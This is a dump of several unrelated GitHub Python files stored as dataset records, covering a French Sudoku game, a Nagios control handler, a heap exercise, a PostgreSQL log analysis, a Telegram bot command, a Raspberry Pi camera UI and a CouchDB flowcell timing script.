liste de listes, où chaque liste représente une ligne de la grille et contient des widgets Entry individuels pour chaque cellule de la ligne.\n for ligne in range(9):\n # Créer une nouvelle ligne pour la grille\n ligne_cree = []\n\n for colonne in range(9):\n # Créer un nouveau compartiment pour la grille, pour chaque case de la grille, une entrée est créée\n compartiment = tk.Entry(fenetre, justify=\"center\", width=6, font=(\"Arial\", 10))\n\n # Calculer l'indice de la région correspondant à la case\n region_ligne = ligne // 3\n region_colonne = colonne // 3\n region_ligne2 = ligne // 6\n region_colonne2 = colonne // 6\n region_ligne3 = ligne // 9\n region_colonne3 = colonne // 9\n\n # Le positionner dans la grille en fonction de son indice de région\n compartiment.grid(row=ligne + region_ligne + region_ligne2 + region_ligne3, column=colonne+region_colonne + region_colonne2 + region_colonne3, padx=4, pady=4)\n #Les entrées sont stockées dans une liste row pour chaque ligne, qui est ensuite ajoutée à la liste grid pour former la grille complète.\n \n # Ajouter la case à la ligne\n ligne_cree.append(compartiment)\n\n # Ajouter la ligne à la grille , la grille entière est construite ligne par ligne, chaque nouvelle ligne étant ajoutée à la liste grille_cree.\n 
grille_cree.append(ligne_cree)\n\n # Création de la grille de sudoku en ajoutant grille_principale a la fonction \n grille_defini = creation_grille_aleatoire()\n\n # retirer aléatoirement des chiffres de la grille complétée pour créer une grille de Sudoku résoluble\n for i in range(81):\n # calculer les indices de colonne et de ligne pour chaque cellule de la grille en fonction de l'indice i\n colonne = i % 9 \n ligne = i // 9 # obtient la cellule correspondante dans la liste grille_cree à l'aide de ces indices.\n cellule = grille_cree[colonne][ligne]\n \n if random.random() < 0.4: \n # supprimer des nombres sélectionnés au hasard dans une grille de Sudoku complétée afin de créer une grille résoluble.\n cellule.delete(0, tk.END) # supprimer le contenu de la cellule, en commençant par l'index 0 jusqu'à tk.END\n else: \n #utilisée pour insérer une valeur dans un widget Tkinter, utilisée pour insérer un nombre dans la cellule, à partir de l'index 0. \n cellule.insert(0, str(grille_defini[ligne][colonne])) \n #définir l'option state du widget cellule sur \"disabled\", ce qui empêche l'utilisateur de modifier la valeur de la cellule.\n cellule.config(state=\"disabled\")\n\n # retourné la grille \n return grille_cree\n\n# Création de la grille de sudoku en ajoutant grille_principale a la fonction\ngrille_principale = cree_grille()\n\n\n# Fonction pour vérifier la grille de sudoku\ndef verifie_grille():\n global nb_erreurs\n \n for l in range(9):\n for c in range(9):\n \n valeur = grille_principale[l][c].get()\n if valeur == \"\" or not valeur.isdigit() or int(valeur) < 1 or int(valeur) > 9:\n messagebox.showerror(\"Erreur\", \"Il manque une valeur dans la case ou elle ne respecte pas les contrainte du jeu ({}, {}).\".format(l+1, c+1)) #vide ou valeur invalide\n nb_erreurs += 1\n \n # Mise à jour du nombre d'erreurs\n nb_erreurs_label.config(text=\"Erreurs: {}\".format(nb_erreurs))\n return\n\n for l in range(9):\n\n nombre_ligne = set() #utilisé pour stocker les chiffres uniques trouvés dans une ligne particulière de la grille de Sudoku.\n nombre_colone = set() #La fonction itère sur chaque cellule de la ligne et ajoute la valeur de chaque cellule à l'ensemble nombre colone...\n nombre_carre = set() #trie dans l'ordre croissant une liste de chiffre et supprime les doublons\n\n for c in range(9):\n # Vérifier la colonne c\n\n if grille_principale[c][l].get() in nombre_colone:\n messagebox.showerror(\"Erreur\", \"Il y a une erreur dans la colonne {}.\".format(l+1))\n nb_erreurs += 1\n \n # Mise à jour du nombre d'erreurs\n nb_erreurs_label.config(text=\"Erreurs: {}\".format(nb_erreurs))\n return\n nombre_colone.add(grille_principale[c][l].get()) #ajoute la valeur de la cellule de la grille à \"nombre_colone\"\n\n # Vérifier la ligne l\n\n if grille_principale[l][c].get() in nombre_ligne:\n messagebox.showerror(\"Erreur\", \"Il y a une erreur dans la ligne {}.\".format(l+1))\n nb_erreurs += 1\n \n # Mise à jour du nombre d'erreurs\n nb_erreurs_label.config(text=\"Erreurs: {}\".format(nb_erreurs))\n return\n nombre_ligne.add(grille_principale[l][c].get())\n\n # Vérifier le carre 3x3 (l // 3, l % 3)\n carre_ligne = (l // 3) * 3 + c // 3\n carre_colone = (l % 3) * 3 + c % 3\n\n if grille_principale[carre_ligne][carre_colone].get() in nombre_carre:\n messagebox.showerror(\"Erreur\", \"Il y a une erreur dans le carre ({}, {}).\".format(l // 3 + 1, l % 3 + 1))\n nb_erreurs += 1\n \n # Mise à jour du nombre d'erreurs\n nb_erreurs_label.config(text=\"Erreurs: {}\".format(nb_erreurs))\n return\n 
nombre_carre.add(grille_principale[carre_ligne][carre_colone].get())\n \n \n messagebox.showinfo(\"Tu as terminé en\", \"Temps: {:02d}:{:02d}\".format(temps // 60, temps % 60))\n messagebox.showinfo(\"Erreurs\", \"Tu as fait {} erreur(s) durant cette parti.\".format(nb_erreurs))\n messagebox.showinfo(\"Bien joué\", \"La grille de Sudoku est correcte !\")\n\n# Création du bouton de vérification\nbouton_verif = tk.Button(fenetre, text=\"Vérifier\", command=verifie_grille)\nbouton_verif.grid(row=12, column=5)\n\nnb_erreurs_label = tk.Label(fenetre, text=\"Erreurs: 0\")\nnb_erreurs_label.grid(row=13, column=5)\n\n\ndef couleur_de_base():\n global grille_principale\n for l in range(9):\n for c in range(9):\n grille_principale[l][c].config(bg=\"white\")\n\nbase_couleur_bouton = tk.Button(fenetre, text=\"Rénitialiser les couleurs\", command=couleur_de_base)\nbase_couleur_bouton.grid(row=11, column=12)\n\n\ndef quitter_partie():\n if messagebox.askyesno(\"J'arrete\", \"Veux-tu réelement quitter la parti ?\"): #Demander une question\n fenetre.destroy() # détruit la fenêtre principale de l'application et quitte le programme.\n\nquitter_bouton = tk.Button(fenetre, text=\"Quitter\", command=quitter_partie)\nquitter_bouton.grid(row=12, column=7)\n\n'''\ndef indice_aleatoire():\n global grille_principale\n\n # Choisir une cellule vide aléatoirement\n #crée une compréhension de liste qui parcourt toutes les cellules de la grille et ajoute les valeurs de toutes les cellules vides à la liste cellules_vides.\n cellules_vides = [(l, c) for l in range(9) for c in range(9) if grille_principale[l][c].get() == \"\"]\n\n if cellules_vides:\n ligne, colonne = random.choice(cellules_vides)\n # Insérer une valeur aléatoire entre 1 et 9\n valeur = random.randint(1, 9)\n grille_principale[ligne][colonne].insert(0, valeur)\n \n else:\n messagebox.showerror(\"Erreur\", \"Il n'y a plus de cases vides!\")\n\nindice_bouton = tk.Button(fenetre, text=\"Indices\\npiégers\", command=indice_aleatoire)\nindice_bouton.grid(row=12, column=3)\n'''\n\nessaie_possible=0\nessaie_utilise=0\ndef indice_juste():\n global grille_principale, essaie_possible, essaie_utilise\n essaie_possible+=1\n essaie_utilise+=1\n if essaie_possible == 5:\n aide_bouton.config(state=tk.DISABLED)\n\n # Trouver une cellule vide aléatoirement\n i = random.randint(0, 8) #génèrent des indices aléatoires (i et j) jusqu'à ce qu'une cellule vide soit trouvée dans la grille_principale.\n j = random.randint(0, 8)\n while grille_principale[i][j].get() != \"\":\n i = random.randint(0, 8)\n\n # Trouver une valeur valide pour la cellule\n valeurs_correct = [\"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\"]\n \n for l in range(9):\n if grille_principale[l][j].get() in valeurs_correct:\n valeurs_correct.remove(grille_principale[l][j].get()) #indice l est utilisé pour sélectionner la ligne, et j pour la colonne.\n if grille_principale[i][l].get() in valeurs_correct:\n valeurs_correct.remove(grille_principale[i][l].get()) #grille_principale est une liste bidimensionnelle valide avec au moins l lignes et j colonne\n \n # Remplir la cellule avec la valeur choisie aléatoirement\n if valeurs_correct:\n valeur = random.choice(valeurs_correct)\n grille_principale[i][j].insert(0, valeur)\n\n nb_aleatoire = 5 - essaie_utilise\n nb_aleatoire_label.config(text=\"Essais: {}\".format(nb_aleatoire))\n\n# Ajout d'un bouton pour obtenir de l'aide\naide_bouton = tk.Button(fenetre, text=\"Valeurs\", command=indice_juste)\naide_bouton.grid(row=12, column=3)\n\nnb_aleatoire_label 
= tk.Label(fenetre, text=\"Essais: 5\") \nnb_aleatoire_label.grid(row=13, column=3)\n\n\n# Affichage de la fenêtre\nfenetre.mainloop()","repo_name":"uvsq22200855/Projet_python","sub_path":"SUDOKU.py","file_name":"SUDOKU.py","file_ext":"py","file_size_in_byte":18193,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1250171243","text":"#!/usr/bin/env python\n#coding=utf-8\nimport base\nfrom toughlib.permit import permit\nfrom cyclone.web import authenticated\n\n\n\n@permit.route('/nagios/ctl')\nclass HostHandler(base.BaseHandler):\n\n\n @authenticated\n def get(self, template_variables={}):\n self.render('nagiosctl.html') \n\n @authenticated\n def post(self,**kwargs):\n def get_function(name):\n CMDS = {\n 'status' : self.nagapi.status_nagios,\n 'running': self.nagapi.is_running,\n 'reload' : self.nagapi.reload_nagios,\n 'start' : self.nagapi.start_nagios,\n 'stop' : self.nagapi.stop_nagios,\n 'restart': self.nagapi.restart_nagios,\n 'verify' : self.nagapi.verify_config\n }\n return CMDS[name]\n result = get_function(self.get_argument(\"exec\"))()\n self.render_json(code=result.code,msg=result.msg)\n\n","repo_name":"talkincode/ToughNMS","sub_path":"toughnms/console/handlers/nagiosctl.py","file_name":"nagiosctl.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"6392867605","text":"import heapq\ndef solution(operations):\n answer = []\n heap_min = [] #최소 힙\n heap_max = [] #최대 힙\n \n while(operations): #연산이 남아있을때까지 동작\n term_oper = operations.pop(0) #차례대로 연산을 oper_term 저장\n term = int(term_oper[2:]) #연산 중 숫자만 따로 D -11 일경우 term = -11\n if term_oper[:1] == 'I': #D -11일 경우 per_term[:1] = D 이 경우 else로 감.\n heapq.heappush(heap_min,term) #최소힙만들기\n heapq.heappush(heap_max,(-1 * term,term)) #최대힙 만들기, 안에 구조는 튜플구조 (예시) heap_max = [(-10,10),(12,-12)] \n else:\n if len(heap_min) == 0 : pass #heap이 빈경우\n elif term == -1: #최솟값 제거일때\n term_min = heapq.heappop(heap_min) #최소힙에서 pop실행 이때 변수 저장해서 아래 최대힙도 pop 해야함 이유)최소힙과 최대힙은 안의 구성원이 동일해야함\n heap_max.remove((-1 * term_min,term_min)) #최대힙은 튜플로 되어있으므로 그 형식에 맞춰서 제거\n \n else: #최댓값 제거일때\n term_max = heapq.heappop(heap_max)[1]\n heap_min.remove(term_max)\n \n if heap_min :\n answer.append(heapq.heappop(heap_max)[1])\n answer.append(heapq.heappop(heap_min))\n else :\n answer.append(0)\n answer.append(0)\n \n return answer\n\n#차례대로 연산을 진행하지않고 제거연산 추가연산 따로 진행하여 발생한 코드 오류\n\n'''\nimport heapq\ndef solution(operations):\n answer = []\n heap_min = []\n heap_max = []\n oper = []\n for i in operations:\n if i[0] == 'I':\n heapq.heappush(heap_min,int(i[1:]))\n heapq.heappush(heap_max,(-1 * int(i[1:]),int(i[1:])))\n else:\n oper.append(int(i[1:]))\n \n print(heap_min)\n print(heap_max)\n print(oper)\n \n \n for j in oper:\n if len(heap_min) == 0 : break\n elif j == -1:\n term_min = heapq.heappop(heap_min)\n heap_max.remove((-1 * term_min,term_min))\n print('min_min삭제',heap_min)\n print('min_max삭제',heap_max)\n\n else:\n term_max = heapq.heappop(heap_max)[1]\n heap_min.remove(term_max)\n print('max_min삭제',heap_min)\n print('max_max삭제',heap_max)\n \n print(heap_min)\n \n if heap_min :\n answer.append(heapq.heappop(heap_max)[1])\n answer.append(heapq.heappop(heap_min))\n else :\n answer.append(0)\n answer.append(0)\n \n return 
answer\n\n'''\n","repo_name":"Jun-ga/Coding_Practice","sub_path":"programmers/Heap/이중우선순위큐.py","file_name":"이중우선순위큐.py","file_ext":"py","file_size_in_byte":2738,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41748554334","text":"#!/usr/bin/python3\n\nimport psycopg2\n\ndbname = \"news\"\n\ndef connect(database_name):\n # Connect to the PostgreSQL database. Returns a databse connection.query\n try:\n db = psycopg2.connect(database=database_name)\n c = db.cursor()\n return db, c\n except psycopg2.Error as e:\n print ('Unable to connect to database')\n raise e\n\nclass get_query_results(object):\n # Parent class to get the query results\n def __init__(self, query):\n self.query = query\n db, c = connect(dbname)\n c.execute(self.query)\n self.rows = c.fetchall()\n db.close()\n\nclass poparticles(get_query_results):\n # Return the all time most popular articles\n def __init__(self, query):\n # Initialize attributes of the parent class\n super().__init__(query)\n # Print the results of the child class\n for (title, count) in self.rows:\n print(\" {} - {} views\".format(title, count))\n\nclass popauthors(get_query_results):\n # Return the all time most popular authors\n def __init__(self, query):\n # Initialize attributes of the parent class\n super().__init__(query)\n # Print the results of the child class\n for (name, count) in self.rows:\n print(\" {} - {} views\".format(name, count))\n\nclass requesterror(get_query_results):\n # Return on which days did more than 1% of requests lead to errors\n def __init__(self, query):\n # Initialize attributes of the parent class\n super().__init__(query)\n # Print the results of the child class\n for (formattedate, errorrate) in self.rows:\n print(\"{} - {:.2}% errors\".format(formattedate, errorrate))\n# for row in self.rows:\n# print (str(row[0]), ' - ', str(round(row[1], 1)), '% errors')\n","repo_name":"sssamwong/Udacity-FSWD","sub_path":"Project_Logs_Analysis/vagrant/LogAnalysis/analysismethod.py","file_name":"analysismethod.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23048968316","text":"# Bu araç @keyiflerolsun tarafından | @KekikAkademi için yazılmıştır.\n\nfrom Robot.Edevat.zenginLog import log_yolla, hata_log\nfrom Robot import DESTEK_KOMUT\nfrom pathlib import Path\n\nDESTEK_KOMUT.update({\n Path(__file__).stem : {\n \"aciklama\" : \"Merhaba dünya..\",\n \"kullanim\" : [\n None\n ],\n \"ornekler\" : [\n \".komut\"\n ]\n }\n})\n\nfrom pyrogram import Client, filters\n\n@Client.on_message(filters.command(['komut'], ['!','.','/']))\nasync def komut(client, message):\n # < Başlangıç\n await log_yolla(client, message)\n ilk_mesaj = await message.reply(\"__Bekleyin..__\",\n disable_web_page_preview = True,\n parse_mode = \"Markdown\"\n )\n #------------------------------------------------------------- Başlangıç >\n\n\n await ilk_mesaj.reply(\"Merhaba dünyalı\")\n\n try:\n hata_denemesi()\n except Exception as hata:\n await hata_log(client, hata)\n await ilk_mesaj.edit(f'**Hata Var !**\\n\\n`{type(hata).__name__}`\\n\\n__{hata}__')","repo_name":"omerfarukbicer042/bot","sub_path":"Robot/Eklentiler/!komut.py","file_name":"!komut.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34628611316","text":"import os\nimport pygame\nfrom pygame.locals import *\nimport cv2\nimport numpy 
\nimport datetime\nimport math\nimport sys\n\n'''\nUI Layout:\nTall thin left panel: Leftmost 10-20% of screen\n    Contains buttons: stop_preview, start_preview, save_image\nRemaining screen used for video display\n\nDone:\n* Implement video start/stop buttons\n* Implement video transform to fill viewing area\n* Implement button text change when pressed\n\nTodo:\n* Brightness control (does appear to be available on the Kuman 3.5 LCD)\n* Add icon to flip image orientation vertically or horizontally\n* Improve debug options\n\n* Clickable icons and/or shapes\n* Update component to scale out if resolution is greater than a certain size.\n* Implement brightness slider\n* Performance\n    Use timeit to verify some different methods of retrieving and displaying video.\n    https://pythonhow.com/measure-execution-time-python-code/\n    https://docs.python.org/2/library/timeit.html\n    https://stackoverflow.com/questions/7370801/measure-time-elapsed-in-python\n    VideoCapture options\n    https://docs.opencv.org/2.4/modules/highgui/doc/reading_and_writing_images_and_video.html#videocapture-set\n    ex. CV_CAP_PROP_CONVERT_RGB - whether or not to convert to RGB\n    Test using camera directly.\n    Make new class for each method. Test and report methodically.\n    Use matplotlib to generate a diagram reporting results.\n* display a splash screen until loading is done\n\nCode references:\nhttps://github.com/Mekire/pygame-button\nhttps://github.com/facelessloser/night_vision_pi/blob/master/camera_app/camera.py\nhttps://learn.adafruit.com/pages/697/elements/83233/download (pyscope.py)\nhttps://github.com/adafruit/adafruit-pi-cam\n'''\n\n# Find the correct framebuffer device (/dev/fb0 or /dev/fb1) and set\n# it here or set it as an env variable.\n# Before running, on the command line, set the env var DISPLAY.
 Run `export DISPLAY=0:0` or `export DISPLAY=:0`\n# or set it here.\nos.environ[\"SDL_FBDEV\"] = \"/dev/fb0\"\n\n# Initialize variables\nscreen = None\nbackground = None\nclock = None\ncomponents = []\nevent_consumers = []\nbtnStartStop = None\nvideo_viewer = None\nflip_mouse_event_xy = True\n\n# Colors\nRED = (200,0,0)\nGREEN = (0,200,0)\nBLUE = (0,0,255)\nBLACK = (0,0,0)\nBRIGHT_RED = (255,0,0)\nBRIGHT_GREEN = (0,255,0)\nBRIGHTISH_GREEN = (30,230,30)\n\n\ndef main():\n    global screen, clock\n    # Configure and verify any required drivers\n    verify_drivers()\n\n    # Initialize pygame\n    pygame.init()\n    # Initialize clock\n    clock = pygame.time.Clock()\n    # Disable mouse visibility\n    pygame.mouse.set_visible(False)\n    # Initializes a new pygame screen using the framebuffer\n    screen = build_screen()\n\n    pygame.display.set_caption('Pi Cam')\n    draw_background()  # Draw and blit background and text\n    pygame.display.update()  # Draw initial screen\n    add_components()\n    event_loop()  # Run event loop\n    video_viewer.release()\n    sys.exit(0)\n\n\n'''\nBuild initial pygame screen object.\nGet available modes from pygame.display.list_modes() and use the smallest mode > 480x320\n'''\ndef build_screen():\n    # Defaults\n    my_res = (640,480)\n    # Initialize screen\n    modes = pygame.display.list_modes()\n    if modes:\n        print(\"modes found\")\n        print(modes)\n        my_res = next(iter([item for item in reversed(modes) if item[0] > 480]))\n\n    s_flags = pygame.FULLSCREEN\n    if my_res[0] > 1000:\n        s_flags = pygame.RESIZABLE\n\n    print(\"Initializing screen at {}x{}\".format(my_res[0],my_res[1]))\n    screen = pygame.display.set_mode(my_res, s_flags)\n\n    return screen\n\n\n'''\nObsoleted due to inaccuracy of display.Info() when not using X windows\n'''\ndef build_screen_with_display_info():\n    # Get native display info from display.Info() by calling it before running first display.set_mode()\n    # NOTE: sometimes display.Info() is not accurate, in particular without X windows, while using framebuffer\n    s_res = (800,600)\n    s_flags = 0\n\n    native_info = pygame.display.Info()\n    res_native = (native_info.current_w, native_info.current_h)\n    if native_info.current_w < 800:\n        s_res = res_native\n        s_flags = pygame.FULLSCREEN\n        print(\"Screen setup - flags: FULLSCREEN, resolution: {}\".format(s_res))\n    else:\n        # Since resizable, adjust viewing area to be smaller than full screen\n        res_tmp = s_res\n        s_res = (int(res_tmp[0]*0.8), int(res_tmp[1]*0.8))\n        s_flags = pygame.RESIZABLE\n        print(\"Screen setup - flags: RESIZABLE, resolution: {}\".format(s_res))\n    screen = pygame.display.set_mode(s_res, s_flags)\n    return screen\n\n\ndef add_components():\n    global video_viewer, components, event_consumers, btnStartStop\n    s_width = screen.get_size()[0]\n    s_height = screen.get_size()[1]\n\n    # Add PiCamera viewer\n    viewer_rect = pygame.Rect((0,0),screen.get_size())\n    video_viewer = Cv2LocalCameraViewer(viewer_rect)\n    components.append(video_viewer)\n\n    # Add Start button\n    btn_rect1 = pygame.Rect(4,4,int(s_width*0.1),int(s_height*0.1))\n    initial_text = \"Stop\" if video_viewer.get_running() == True else \"Start\"\n    btnStartStop = Button(btn_rect1,text=initial_text, callback=btnStartStop_callback)\n    components.append(btnStartStop)\n    event_consumers.append(btnStartStop)\n\n\ndef btnStartStop_callback():\n    global video_viewer, btnStartStop\n    if video_viewer is None or btnStartStop is None:\n        return\n    video_viewer.set_running(not video_viewer.get_running())\n    running = video_viewer.get_running()\n    if running:\n        btnStartStop.set_text(\"Stop\")\n    else:\n        
btnStartStop.set_text(\"Start\")\n\n\ndef shutdown():\n # release camera. If this isn't done, pi may need to be rebooted before it can be used again\n video_viewer.release()\n sys.exit(0)\n\n\ndef translate_click_pos(orig_pos):\n global screen, flip_mouse_event_xy\n if not flip_mouse_event_xy:\n pos = orig_pos\n else:\n print(\"swapping click pos x and y\")\n pos = (screen.get_size()[0] - orig_pos[0], screen.get_size()[1] - orig_pos[1])\n return pos\n\n\ndef event_loop():\n # Event loop\n click_pos = None\n running = True\n while running:\n for event in pygame.event.get():\n if event.type == QUIT:\n running = False\n elif event.type == KEYDOWN:\n if event.key == K_q:\n running = False\n if event.type == MOUSEBUTTONDOWN or event.type == MOUSEMOTION:\n click_pos = translate_click_pos(event.pos)\n for ec in event_consumers:\n ec.check_event(event)\n\n draw_background()\n for c in components:\n c.draw()\n #if click_pos:\n # pygame.draw.rect(screen, BLUE, (click_pos[0]-5,click_pos[1]-5, 20, 20))\n pygame.draw.rect(screen, RED, screen.get_rect().inflate(-2,-2), 4)\n pygame.display.update()\n clock.tick(30)\n\n\nclass Cv2LocalCameraViewer:\n '''\n PicameraViewer class\n Expand video frame width to fill self.rect maximally and scale height by same scale factor.\n OpenCV VideoCapture properties:\n https://docs.opencv.org/2.4/modules/highgui/doc/reading_and_writing_images_and_video.html#videocapture-set\n '''\n def __init__(self, rect, **kwargs):\n self.noframe_count = 0\n self.rect = rect\n self.capture_enabled = True\n self.fps = 24\n if kwargs:\n for key, value in kwargs.items():\n if key == 'capture_enabled' : self.capture_enabled = value\n\n # Initialize stream capture\n self.cap = cv2.VideoCapture(0)\n self.cap.set(cv2.CAP_PROP_FPS, self.fps)\n #self.cap.set(cv2.CAP_PROP_CONVERT_RGB, 1)\n if not self.cap.isOpened():\n print(\"Failure opening camera 0.\")\n self.capture_enabled = False\n # Initialize font for stopped capture\n self.font = pygame.font.Font(None, int(self.rect.width / 12))\n # Create background surface\n self.bg = pygame.Surface((self.rect.width, self.rect.height)).convert()\n self.text_stopped = self.font.render(\"Stopped\", 1, (220,220,220))\n # Initialize variable that will hold the scaled video height\n self.scaled_height = 0\n\n def set_running(self, enabled=True):\n self.capture_enabled = enabled\n\n def get_running(self):\n return self.capture_enabled\n\n def release(self):\n self.cap.release()\n\n def draw(self):\n # Get and display MJPEG frames (images) if video is enabled\n # image returned by CV2 is a numpy array\n if not self.capture_enabled:\n self.bg.fill((0,0,0))\n textpos = self.text_stopped.get_rect()\n textpos.center = self.bg.get_rect().center\n self.bg.blit(self.text_stopped, textpos)\n screen.blit(self.bg, self.rect)\n else:\n ret, img = self.cap.read()\n if not ret or img is None:\n self.noframe_count = self.noframe_count + 1\n else:\n self.noframe_count = 0\n # print(\"{} - frame read - {}\".format(datetime.datetime.now(), ret))\n img = cv2.cvtColor(img,cv2.COLOR_BGR2RGB) # no longer needed after setting CV_CAP_PROP_CONVERT_RGB\n #img = np.rot90(img, 3)\n img = np.swapaxes(img,0,1) # replaces np.rot90(frame)\n img = np.flipud(img) # flip image array on the y-axis only\n img = np.fliplr(img) # flip image array on the y-axis only, using fliplr because we already swapped axes\n # Calculate scaled width and height of video\n if self.scaled_height == 0:\n frame_w, frame_h = img.shape[:2] # getting dimensions of image, which is actually an ndarray\n scale_factor 
= self.rect.width/frame_w\n self.scaled_height = math.floor(frame_h * scale_factor / 2.0) * 2 # rounds down to nearest even int\n frame = pygame.surfarray.make_surface(img)\n frame = pygame.transform.scale(frame,(self.rect.width,self.scaled_height))\n screen.blit(frame, self.rect, self.rect)\n\n\nclass Button:\n ''' Button class: rect, label text, color, bgcolor, callback\n '''\n def __init__(self, rect, **kwargs):\n self.rect = rect # Boundary rect\n self.color = (10,10,10) # text color\n self.bgcolor = BRIGHTISH_GREEN # bg color\n self.text = '>' # text\n self.callback = None # Callback function\n if kwargs:\n for key, value in kwargs.items():\n if key == 'color' : self.color = value\n elif key == 'bgcolor' : self.bgcolor = value\n elif key == 'text' : self.text = value\n elif key == 'callback' : self.callback = value\n # Create font\n self.font = pygame.font.Font(None, int(screen.get_size()[1]/20))\n # Create background surface\n self.bg = pygame.Surface((self.rect.width, self.rect.height)).convert()\n self.clicked = False\n\n def set_text(self, text):\n if text is None:\n self.text = ''\n else:\n self.text = text\n\n def check_event(self, event):\n ''' Receive and process events from event loop.\n Events handled:\n MOUSEBUTTONUP pos, button\n MOUSEBUTTONDOWN pos, button\n FINGERDOWN touch_id, finger_id, x, y, dx, dy\n FINGERUP touch_id, finger_id, x, y, dx, dy\n NOTE: FINGERDOWN and FINGERUP events not supported until pygame 1.9.5\n '''\n if event.type == pygame.MOUSEBUTTONDOWN and event.button == 1:\n self.handle_mousedown(event)\n elif event.type == pygame.MOUSEBUTTONUP and event.button == 1:\n self.handle_mouseup(event)\n # elif event.type == FINGERDOWN:\n # self.handle_fingerdown(event)\n # elif event.type == FINGERUP:\n # self.handle_fingerup(event)\n\n def handle_mousedown(self, event):\n '''Handle mousedown event'''\n #print('Mouse down')\n if self.rect.collidepoint(translate_click_pos(event.pos)):\n self.clicked = True\n print('{} - Button click detected at {}'.format(self.text, translate_click_pos(event.pos)))\n\n def handle_mouseup(self, event):\n '''Handle mouse up event. By default, callback function is called on mouse/finger up.'''\n if self.clicked:\n if not self.callback == None:\n self.callback()\n self.clicked = False\n\n # def handle_fingerdown(self, event):\n # '''Handle fingerdown event'''\n # #print('Finger down')\n # event_pos = (event.x, event.y)\n # if self.rect.collidepoint(event_pos):\n # self.clicked = True\n # print('{} - Finger down (click) detected'.format(self.text))\n\n # def handle_fingerup(self, event):\n # '''Handle finger up event. 
By default, callback function is called on mouse/finger up.'''\n # if self.clicked:\n # if not self.callback == None:\n # self.callback()\n # self.clicked = False\n\n def draw(self):\n # Add border if selected\n self.bg.fill(self.bgcolor)\n # Create invisible cursor to use mouse pointer but not see it.\n pygame.mouse.set_cursor((8,8),(0,0),(0,0,0,0,0,0,0,0),(0,0,0,0,0,0,0,0))\n # Add text\n text = self.font.render(self.text, 1, self.color)\n textpos = text.get_rect()\n textpos.center = self.bg.get_rect().center\n self.bg.blit(text, textpos)\n screen.blit(self.bg, self.rect)\n # if self.drawborder:\n # print('Trying to draw border')\n # pygame.draw.rect(screen, RED, self.rect.inflate(-2,-2), 4)\n\n\ndef draw_background():\n global background\n # Fill background\n if not background:\n background = pygame.Surface(screen.get_size()).convert()\n background.fill(BLACK)\n screen.blit(background, (0, 0))\n\n\ndef verify_drivers():\n # Based on \"Python GUI in Linux frame buffer\"\n # http://www.karoltomala.com/blog/?p=679\n disp_no = os.getenv(\"DISPLAY\")\n if disp_no:\n print (\"I'm running under X display = {0}\".format(disp_no))\n\n # Check which frame buffer drivers are available\n # Start with fbcon since directfb hangs with composite output\n drivers = ['fbcon', 'directfb', 'svgalib']\n found = False\n for driver in drivers:\n # Make sure that SDL_VIDEODRIVER is set\n if not os.getenv('SDL_VIDEODRIVER'):\n os.putenv('SDL_VIDEODRIVER', driver)\n try:\n pygame.display.init()\n except pygame.error:\n print('Driver: {0} failed.'.format(driver))\n continue\n found = True\n if not found:\n raise Exception('No suitable video driver found!')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"jwalkerdev/pi-nv","sub_path":"src/camera-ui/pg-picam-ui.py","file_name":"pg-picam-ui.py","file_ext":"py","file_size_in_byte":14967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36479414616","text":"import os\nimport couchdb\nimport glob\nimport logging\nfrom datetime import datetime\nfrom datetime import date\nimport argparse\nimport yaml\ntry:\n import ConfigParser\nexcept ImportError:\n import configparser\n\nCONFIG = {}\n\nlogger = logging.getLogger(__name__)\n\n\n\ndef main(args):\n configuration_file = args.config\n load_yaml_config(configuration_file)\n couch=setupServer(CONFIG)\n flowcell_db = couch[\"x_flowcells\"]\n instruments = {}\n instruments[\"ST-E00198\"] = []\n instruments[\"ST-E00201\"] = []\n instruments[\"ST-E00214\"] = []\n instruments[\"ST-E00266\"] = []\n instruments[\"ST-E00269\"] = []\n\n for fc_doc in flowcell_db:\n try:\n instrument = flowcell_db[fc_doc][\"Runinfo\"][\"Instrument\"]\n fcid = flowcell_db[fc_doc][\"Runinfo\"][\"Id\"]\n except KeyError:\n if \"RunInfo\" in flowcell_db[fc_doc]:\n instrument = flowcell_db[fc_doc][\"RunInfo\"][\"Instrument\"]\n fcid = flowcell_db[fc_doc][\"RunInfo\"][\"Id\"]\n else:\n continue\n #check if the instrument is one of the ones I want to check\n if instrument in [\"ST-E00198\", \"ST-E00201\", \"ST-E00214\", \"ST-E00266\", \"ST-E00269\"]:\n try:\n time_cycles = flowcell_db[fc_doc][\"time cycles\"]\n except KeyError:\n continue\n first_cycle_start = time_cycles[0]['start']\n last_cycle_end = time_cycles[-1]['end']\n # the split is done to remove the decimal point in the seconds\n first_cycle_date = datetime.strptime(first_cycle_start.split(\".\")[0], '%Y-%m-%d %H:%M:%S')\n last_cycle_date = datetime.strptime(last_cycle_end.split(\".\")[0], '%Y-%m-%d %H:%M:%S')\n delta = 
last_cycle_date - first_cycle_date\n            instruments[instrument].append({\"{}\".format(fcid): delta.total_seconds()/3600})\n\n    for instrument in instruments:\n        print(\"time\\t{}\".format(instrument))\n        for run in sorted(instruments[instrument]):\n            date_illumina_format = list(run.keys())[0].split(\"_\")[0]\n            date_exel_format = \"{}/{}/20{}\".format(date_illumina_format[4:6], date_illumina_format[2:4], date_illumina_format[0:2])\n            print(\"{}\\t{}\".format(date_exel_format, run[list(run.keys())[0]]))\n\n\n\n\ndef setupServer(conf):\n    db_conf = conf['statusdb']\n    url = \"https://{0}:{1}@{2}\".format(db_conf['username'], db_conf['password'], db_conf['url'])\n    return couchdb.Server(url)\n\n\n\ndef load_yaml_config(config_file):\n    \"\"\"Load YAML config file\n\n    :param str config_file: The path to the configuration file.\n\n    :returns: A dict of the parsed config file.\n    :rtype: dict\n    :raises IOError: If the config file cannot be opened.\n    \"\"\"\n    if hasattr(config_file, 'read'):  # accept an already-open file-like object\n        